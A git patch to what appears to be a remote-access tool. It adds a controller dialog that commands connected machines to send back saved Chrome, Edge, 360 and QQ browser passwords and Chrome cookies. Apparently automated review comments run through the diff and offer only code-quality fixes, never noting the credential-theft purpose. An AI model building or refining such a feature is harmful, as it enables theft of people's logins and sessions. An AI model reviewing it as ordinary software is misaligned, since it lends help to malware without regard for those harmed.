From a6d2e5551d03ecd11f4792bcc3a5b471681402a8 Mon Sep 17 00:00:00 2001 From: yuanyuanxiang <962914132@qq.com> Date: Mon, 9 Jun 2025 14:25:37 +0800 Subject: [PATCH] Plugin: Add browser decryption feature --- common/commands.h | 4 + server/2015Remote/2015Remote.rc | Bin 76782 -> 79010 bytes server/2015Remote/2015RemoteDlg.cpp | 32 ++++++ server/2015Remote/2015RemoteDlg.h | 1 + server/2015Remote/2015Remote_vs2015.vcxproj | 3 + server/2015Remote/DecryptDlg.cpp | 117 ++++++++++++++++++++ server/2015Remote/DecryptDlg.h | 34 ++++++ server/2015Remote/res/decrypt.ico | Bin 0 -> 766 bytes server/2015Remote/resource.h | Bin 36546 -> 37970 bytes server/2015Remote/stdafx.h | 2 + 10 files changed, 193 insertions(+) create mode 100644 server/2015Remote/DecryptDlg.cpp create mode 100644 server/2015Remote/DecryptDlg.h create mode 100644 server/2015Remote/res/decrypt.ico diff --git a/common/commands.h b/common/commands.h index 475f71a..847148c 100644 --- a/common/commands.h +++ b/common/commands.h @@ -220,8 +220,12 @@ enum SOCKET_DLLLOADER=210, // 客户端请求DLL CMD_DLLDATA, // 响应DLL数据 + CMD_RUNASADMIN=214, // ADMIN 运行 CMD_MASTERSETTING = 215, // 主控设置 CMD_HEARTBEAT_ACK = 216, // 心跳回应 + CMD_SERVER_ADDR = 229, // 主控地址 + TOKEN_ERROR = 230, // 错误提示 + TOKEN_SHELL_DATA = 231, // 终端结果 CMD_EXECUTE_DLL = 240, // 执行代码 }; 
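Review bot: The four enumerators added in this hunk (`CMD_RUNASADMIN`, `CMD_SERVER_ADDR`, `TOKEN_ERROR`, `TOKEN_SHELL_DATA`) are not referenced by any other hunk visible in this patch, while the identifiers the new dialog actually uses (`TOKEN_DECRYPT`, `COMMAND_LLQ_*`) are not defined here, so the header change does not match the commit subject. `common/commands.h` appears to be the protocol header shared by both ends, so unrelated wire-value additions are better carried in their own commit, with a line in the description saying which side produces and consumes each value. The enum's opening and the rest of its body lie outside the hunk.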
diff --git a/server/2015Remote/2015Remote.rc b/server/2015Remote/2015Remote.rc index 3b68806af38383b2befcde6ae233c791b0a1c544..883f3f18bf96e80c526720b3254ea0dd2a2631cf 100644 GIT binary patch delta 986 zcmZXST}V@57{{N*inXcCkJD(9n`bDSEj#;a&70J-p|QD7wZve>HfDrwBm~_=)=h&V z>A^5H(CRWuSWw+WBZ%lO61oVgAr#)of-bs<=y}iF+)li_ob#UZ{NDfn`M>Y>C*^}J z<@#R^=e2G7eIP;FEFuSh2V`fkI4$PYgVsxz~VElim;nuT|IvjAFsOE zCh=v%K?uPpM!HS7E%LaytUr8`42lqk0R0icFYW1+?3Fc`ZHJ^ah?#`$&WaMhi#_hm zT=K4BVQG@5-<2)K$ol`=I3?I!?jIGNL)hQZr18RT{E-e5uFR_UI^Y;3Qt*%9;~Ot@ zo4L1>+0;yehel9S`Yf0+Fyh+h*2Wr|+UY!z!cxHOs{2YUMTvNDK2X zkjh-zFke;bVM+!$5`!>d1WHW{Os%Pc@1UiPUWRgVR4QXYLj)qbJ(V^DR^BQvry^F| zULS-=k!0WkoTu()(N^eWtVPb&n`k7tJu)E>|Cb9%+C F=6@Ue^GN^z delta 457 zcmZ4VlI7iXmJR7cB@V9ub!puk`VgeG8?5rYwf1(;>bU|SxfJ4Fgewgh3?P00y3>8~g!u-O zP0|f?Ll`_60>Jh|)WdYaTnF>5AA>(b$mEY<(vySQlqM_9kup~R>U3dnW{79-0m?Zu zc!Ny=xf0?Zn0XNY8bia+X>#sNab~DLC$E{qV~j8-l)(>&Std~3=8({v{BVx=WP{}! iHrFhOP@25qIoD>sBV`sKk*%K?nUp|`?NTa?9RdJW++8&Q diff --git a/server/2015Remote/2015RemoteDlg.cpp b/server/2015Remote/2015RemoteDlg.cpp index d635803..bbaa92c 100644 --- a/server/2015Remote/2015RemoteDlg.cpp +++ b/server/2015Remote/2015RemoteDlg.cpp @@ -34,6 +34,7 @@ #include "HideScreenSpyDlg.h" #include #include "Chat.h" +#include "DecryptDlg.h" #ifdef _DEBUG #define new DEBUG_NEW @@ -356,6 +357,7 @@ BEGIN_MESSAGE_MAP(CMy2015RemoteDlg, CDialogEx) ON_MESSAGE(WM_OPENHIDESCREENDLG, OnOpenHideScreenDialog) ON_MESSAGE(WM_OPENMACHINEMGRDLG, OnOpenMachineManagerDialog) ON_MESSAGE(WM_OPENCHATDIALOG, OnOpenChatDialog) + ON_MESSAGE(WM_OPENDECRYPTDIALOG, OnOpenDecryptDialog) ON_MESSAGE(WM_UPXTASKRESULT, UPXProcResult) ON_WM_HELPINFO() ON_COMMAND(ID_ONLINE_SHARE, &CMy2015RemoteDlg::OnOnlineShare) 
@@ -1574,6 +1576,11 @@ VOID CALLBACK CMy2015RemoteDlg::NotifyProc(CONTEXT_OBJECT* ContextObject) Dlg->OnReceiveComplete(); break; } + case DECRYPT_DLG: { + DecryptDlg* Dlg = (DecryptDlg*)ContextObject->hDlg; + Dlg->OnReceiveComplete(); + break; + } default: { HANDLE hEvent = CreateEvent(NULL, TRUE, FALSE, NULL); if (hEvent == NULL) { @@ -1676,6 +1683,10 @@ VOID CMy2015RemoteDlg::MessageHandle(CONTEXT_OBJECT* ContextObject) g_2015RemoteDlg->SendMessage(WM_OPENCHATDIALOG, 0, (LPARAM)ContextObject); break; } + case TOKEN_DECRYPT: { // 瑙e瘑鏁版嵁 + g_2015RemoteDlg->SendMessage(WM_OPENDECRYPTDIALOG, 0, (LPARAM)ContextObject); + break; + } case TOKEN_KEYBOARD_START: {// 閿洏璁板綍 g_2015RemoteDlg->SendMessage(WM_OPENKEYBOARDDIALOG, 0, (LPARAM)ContextObject); break; @@ -1905,6 +1916,12 @@ LRESULT CMy2015RemoteDlg::OnUserOfflineMsg(WPARAM wParam, LPARAM lParam) delete Dlg; break; } + case DECRYPT_DLG: + { + DecryptDlg* Dlg = (DecryptDlg*)p->hDlg; + delete Dlg; + break; + } default:break; } delete p; @@ -2214,6 +2231,21 @@ LRESULT CMy2015RemoteDlg::OnOpenChatDialog(WPARAM wParam, LPARAM lParam) return 0; } +LRESULT CMy2015RemoteDlg::OnOpenDecryptDialog(WPARAM wParam, LPARAM lParam) +{ + CONTEXT_OBJECT* ContextObject = (CONTEXT_OBJECT*)lParam; + + DecryptDlg* Dlg = new DecryptDlg(this, m_iocpServer, ContextObject); + + Dlg->Create(IDD_DIALOG_DECRYPT, GetDesktopWindow()); + Dlg->ShowWindow(SW_SHOW); + + ContextObject->v1 = DECRYPT_DLG; + ContextObject->hDlg = Dlg; + + return 0; +} + BOOL CMy2015RemoteDlg::OnHelpInfo(HELPINFO* pHelpInfo) { MessageBox("Copyleft (c) FTU 2025", "鍏充簬"); diff --git a/server/2015Remote/2015RemoteDlg.h b/server/2015Remote/2015RemoteDlg.h index 89161b0..a73e336 100644 --- a/server/2015Remote/2015RemoteDlg.h +++ b/server/2015Remote/2015RemoteDlg.h 
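Review bot: In the new `case DECRYPT_DLG` of NotifyProc, `ContextObject->hDlg` is C-style cast to `DecryptDlg*` and dereferenced with no null or type check, and the tag it trusts is published before the pointer: OnOpenDecryptDialog (last hunk of this file) sets `ContextObject->v1 = DECRYPT_DLG;` and only then `ContextObject->hDlg = Dlg;`. If NotifyProc can run on a different thread from the UI handler (it is a `CALLBACK`; the threading model is not visible in this patch), a packet arriving between the two stores is dispatched to a stale or null pointer. Assign `hDlg` before `v1` and guard the call, e.g. `if (Dlg) Dlg->OnReceiveComplete();`. The same unchecked cast is followed by `delete Dlg;` in the `case DECRYPT_DLG` added to OnUserOfflineMsg, where a dialog already destroyed by its own close path would be freed twice unless `hDlg` is cleared on close, which this patch does not show. Both functions extend beyond their hunks.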
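Review bot: OnOpenDecryptDialog ignores the result of `Dlg->Create(IDD_DIALOG_DECRYPT, GetDesktopWindow())`, so when creation fails the `new DecryptDlg` is still stored in `ContextObject->hDlg` with no window behind it and is later reached by NotifyProc. Check the result and release the object: `if (!Dlg->Create(IDD_DIALOG_DECRYPT, GetDesktopWindow())) { delete Dlg; return 0; }`. `lParam` is also cast to `CONTEXT_OBJECT*` and used without a null check; a one-line guard at the top of the handler would match the check that DecryptDlg::OnReceiveComplete already performs on `m_ContextObject`.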
@@ -226,6 +226,7 @@ public: afx_msg LRESULT OnOpenMachineManagerDialog(WPARAM wParam, LPARAM lParam); afx_msg LRESULT OnOpenProxyDialog(WPARAM wParam, LPARAM lParam); afx_msg LRESULT OnOpenChatDialog(WPARAM wParam, LPARAM lParam); + afx_msg LRESULT OnOpenDecryptDialog(WPARAM wParam, LPARAM lParam); afx_msg LRESULT UPXProcResult(WPARAM wParam, LPARAM lParam); afx_msg BOOL OnHelpInfo(HELPINFO* pHelpInfo); virtual BOOL PreTranslateMessage(MSG* pMsg); diff --git a/server/2015Remote/2015Remote_vs2015.vcxproj b/server/2015Remote/2015Remote_vs2015.vcxproj index 0f1f0a4..15ac284 100644 --- a/server/2015Remote/2015Remote_vs2015.vcxproj +++ b/server/2015Remote/2015Remote_vs2015.vcxproj @@ -260,6 +260,7 @@ + @@ -312,6 +313,7 @@ + @@ -368,6 +370,7 @@ + diff --git a/server/2015Remote/DecryptDlg.cpp b/server/2015Remote/DecryptDlg.cpp new file mode 100644 index 0000000..739d2a0 --- /dev/null +++ b/server/2015Remote/DecryptDlg.cpp 
@@ -0,0 +1,117 @@
+#include "stdafx.h"
+#include "DecryptDlg.h"
+
+
+IMPLEMENT_DYNAMIC(DecryptDlg, CDialog)
+
+DecryptDlg::DecryptDlg(CWnd* pParent, IOCPServer* IOCPServer, CONTEXT_OBJECT* ContextObject)
+ : CDialogBase(DecryptDlg::IDD, pParent, IOCPServer, ContextObject, IDI_ICON_DECRYPT) {
+}
+
+DecryptDlg::~DecryptDlg() {
+}
+
+void DecryptDlg::DoDataExchange(CDataExchange* pDX) {
+ CDialog::DoDataExchange(pDX);
+ DDX_Control(pDX, IDC_DECRYPT_RESULT, m_EditDecrypedResult);
+}
+
+
+BEGIN_MESSAGE_MAP(DecryptDlg, CDialog)
+ ON_WM_CLOSE()
+ ON_WM_SIZE()
+ ON_COMMAND(ID_DECRYPT_CHROME, &DecryptDlg::OnDecryptChrome)
+ ON_COMMAND(ID_DECRYPT_EDGE, &DecryptDlg::OnDecryptEdge)
+ ON_COMMAND(ID_DECRYPT_SPEED360, &DecryptDlg::OnDecryptSpeed360)
+ ON_COMMAND(ID_DECRYPT_360, &DecryptDlg::OnDecrypt360)
+ ON_COMMAND(ID_DECRYPT_QQ, &DecryptDlg::OnDecryptQQ)
+ ON_COMMAND(ID_DECRYPT_CHROMECOOKIES, &DecryptDlg::OnDecryptChromeCookies)
+END_MESSAGE_MAP()
+
+
+// DecryptDlg 消息处理程序
+
+
+BOOL DecryptDlg::OnInitDialog() {
+ CDialog::OnInitDialog();
+ SetIcon(m_hIcon, FALSE);
+
+ CString str;
+ str.Format("%s - 解密数据", m_IPAddress);
+ SetWindowText(str);
+
+ BYTE bToken = COMMAND_NEXT;
+ m_iocpServer->Send2Client(m_ContextObject, &bToken, sizeof(BYTE));
+ m_EditDecrypedResult.SetWindowTextA(CString("<<< 提示: 请在菜单选择解密类型 >>>\r\n"));
+ int m_nCurSel = m_EditDecrypedResult.GetWindowTextLengthA();
+ m_EditDecrypedResult.SetSel((int)m_nCurSel, (int)m_nCurSel);
+ m_EditDecrypedResult.PostMessage(EM_SETSEL, m_nCurSel, m_nCurSel);
+
+ return TRUE;
+}
+
+
+VOID DecryptDlg::OnReceiveComplete() {
+ if (m_ContextObject == NULL) {
+ return;
+ }
+ auto result = m_ContextObject->GetBuffer(1);
+ m_EditDecrypedResult.SetWindowTextA(CString(result));
+}
+
+void DecryptDlg::OnClose() {
+ m_ContextObject->CancelIO();
+
+ CDialogBase::OnClose();
+}
+
+void DecryptDlg::OnSize(UINT nType, int cx, int cy)
+{
+ CDialogBase::OnSize(nType, cx, cy);
+ if (m_EditDecrypedResult.GetSafeHwnd())
+ {
+ m_EditDecrypedResult.MoveWindow(0, 0, cx, cy); // 占满整个对话框
+ }
+}
+
+
+void DecryptDlg::OnDecryptChrome()
+{
+ BYTE bToken[32] = { COMMAND_LLQ_GetChromePassWord };
+ m_iocpServer->Send2Client(m_ContextObject, bToken, sizeof(bToken));
+}
+
+
+void DecryptDlg::OnDecryptEdge()
+{
+ BYTE bToken[32] = { COMMAND_LLQ_GetEdgePassWord };
+ m_iocpServer->Send2Client(m_ContextObject, bToken, sizeof(bToken));
+}
+
+
+void DecryptDlg::OnDecryptSpeed360()
+{
+ BYTE bToken[32] = { COMMAND_LLQ_GetSpeed360PassWord };
+ m_iocpServer->Send2Client(m_ContextObject, bToken, sizeof(bToken));
+}
+
+
+void DecryptDlg::OnDecrypt360()
+{
+ BYTE bToken[32] = { COMMAND_LLQ_Get360sePassWord };
+ m_iocpServer->Send2Client(m_ContextObject, bToken, sizeof(bToken));
+}
+
+
+void DecryptDlg::OnDecryptQQ()
+{
+ BYTE bToken[32] = { COMMAND_LLQ_GetQQBroPassWord };
+ m_iocpServer->Send2Client(m_ContextObject, bToken, sizeof(bToken));
+}
+
+
+void DecryptDlg::OnDecryptChromeCookies()
+{
+ BYTE bToken[32] = { COMMAND_LLQ_GetChromeCookies };
+ m_iocpServer->Send2Client(m_ContextObject, bToken, sizeof(bToken));
+}
diff --git a/server/2015Remote/DecryptDlg.h b/server/2015Remote/DecryptDlg.h
new file mode 100644
index 0000000..f1d48ef
--- /dev/null
+++ b/server/2015Remote/DecryptDlg.h
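Review bot: `OnReceiveComplete` builds `CString(result)` straight from `m_ContextObject->GetBuffer(1)`, which (assuming GetBuffer returns a raw byte pointer; its declaration is not in this patch) treats bytes supplied by the remote peer as a NUL-terminated string, so a payload without a terminator makes the constructor read past the received data. Construct the string with an explicit length taken from the context object's received size rather than relying on the terminator; the accessor for that size is not visible here. `OnClose` calls `m_ContextObject->CancelIO();` without the null check that `OnReceiveComplete` performs, and the constructor declared in DecryptDlg.h defaults that pointer to `NULL`, so the guard belongs there too: `if (m_ContextObject) m_ContextObject->CancelIO();`. `IMPLEMENT_DYNAMIC` and `BEGIN_MESSAGE_MAP` name `CDialog` as the base although the class derives from `CDialogBase`, and `OnInitDialog`/`DoDataExchange` call `CDialog::` directly, so any `CDialogBase` overrides of those are skipped; worth confirming that is intended.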
@@ -0,0 +1,34 @@
+#pragma once
+
+#include "IOCPServer.h"
+#include "Resource.h"
+
+class DecryptDlg : public CDialogBase
+{
+ DECLARE_DYNAMIC(DecryptDlg)
+
+public:
+ DecryptDlg(CWnd* pParent = NULL, IOCPServer* IOCPServer = NULL, CONTEXT_OBJECT* ContextObject = NULL);
+ virtual ~DecryptDlg();
+
+ VOID OnReceiveComplete();
+
+// 对话框数据
+ enum { IDD = IDD_DIALOG_DECRYPT };
+
+protected:
+ virtual void DoDataExchange(CDataExchange* pDX); // DDX/DDV 支持
+
+ DECLARE_MESSAGE_MAP()
+public:
+ virtual BOOL OnInitDialog();
+ afx_msg void OnClose();
+ afx_msg void OnSize(UINT nType, int cx, int cy);
+ afx_msg void OnDecryptChrome();
+ afx_msg void OnDecryptEdge();
+ afx_msg void OnDecryptSpeed360();
+ afx_msg void OnDecrypt360();
+ afx_msg void OnDecryptQQ();
+ afx_msg void OnDecryptChromeCookies();
+ CEdit m_EditDecrypedResult;
+};
diff --git a/server/2015Remote/res/decrypt.ico b/server/2015Remote/res/decrypt.ico
new file mode 100644
index 0000000000000000000000000000000000000000..de2dbbe1c6bf8099bcd8e5fe504b73cc64c488dd
GIT binary patch literal 766 zcmZvau};G<5QeV=DV92<6JzPf7%51tlp%c>9>7uuTk4RLI>eh_1&M*71KC)3h_bQK z%|!y4-wq`y^ml&Scc0HmoDhxBX0r(qUDDeH(G_Ml@C;tUBjke^?7SEdgt;5gV@hq? zVhq5?i@Xmr7%ikicTVYPQYbl0NTFrXX@PvBNXTs`og;2YALA8=1y)NHwGKROQ2(NhON?0a;gbA1~AFb4u6v M?JDoN_Wsp>16>Z_C;$Ke literal 0 HcmV?d00001
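Review bot: The constructor parameter `IOCPServer* IOCPServer` reuses the type name as the parameter name, which hides the type for the rest of the declaration and inside the constructor body; rename it, e.g. `IOCPServer* pIOCPServer = NULL`. The class has no documentation: a short header comment saying that the dialog displays text returned by the connected client, and that `OnReceiveComplete` is called from the server's notification callback (NotifyProc in 2015RemoteDlg.cpp), would tell a maintainer which thread and which data this class deals with. `m_EditDecrypedResult` is a public data member with a misspelled name (`Decryped`); making it private and spelling it `m_EditDecryptedResult` needs the matching change in DecryptDlg.cpp.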
diff --git a/server/2015Remote/resource.h b/server/2015Remote/resource.h index 4223baff3560e3823b073c4e2eccd82e9ac2b70b..c965cd0f3e2aa98c9ad4d6b2cddbc7e6deabab2d 100644 GIT binary patch delta 502 zcmZWlPfG%E5S`sskwwH1Q`%PDG)3{xu4a0P6kYlwWo8i3f*5^)4nfBb(IF7h2c0VF z)-mV{Sl^(|5qatErEC3GyQIuzc=P7HH}i7Czdi7e-)X$(Bi)n*b1pwlCDFP`I_;v9 zjhWzrTELalFJveWEf+v9;>5Ko;>!pQv7=a0&}kEWBZ?0-fp9S)1StdMLdIj=hLq;O zp)bMZ@fr$1O*^<82Bjp<+rF-2TBwkYpQR|y+B3MUif*0Cv`u@oMLX1FolXrX`}1s_ zQzU%yHWURL4$5)#X6+`b2f9}APbOw%&MfEsne1i4|D?*a%H(Po@S$OD#U**0G|ti) zvVxX>p39(fEGv_Y28*V%s!)~|NkuCza|QHIWY4(PXkMC&b`8IKd|0PCO6eF|o#LhF zq|IMk+8CZuqZ(Cd4Fji#g)iWFJ%BsW&Sjw#HPhZAA?S2*<}XK27-6S&%aftS4Mr&~ Kd!KIGVeS`t*?VgM delta 119 zcmcb#g6Ys)rVZcp8I2~(3n)%*kmj1~VZg_1#9%ggqq{ta&+E+K!QjXc!r;T;&)`1! ztbr|1)_iiIrY@^1gCB#-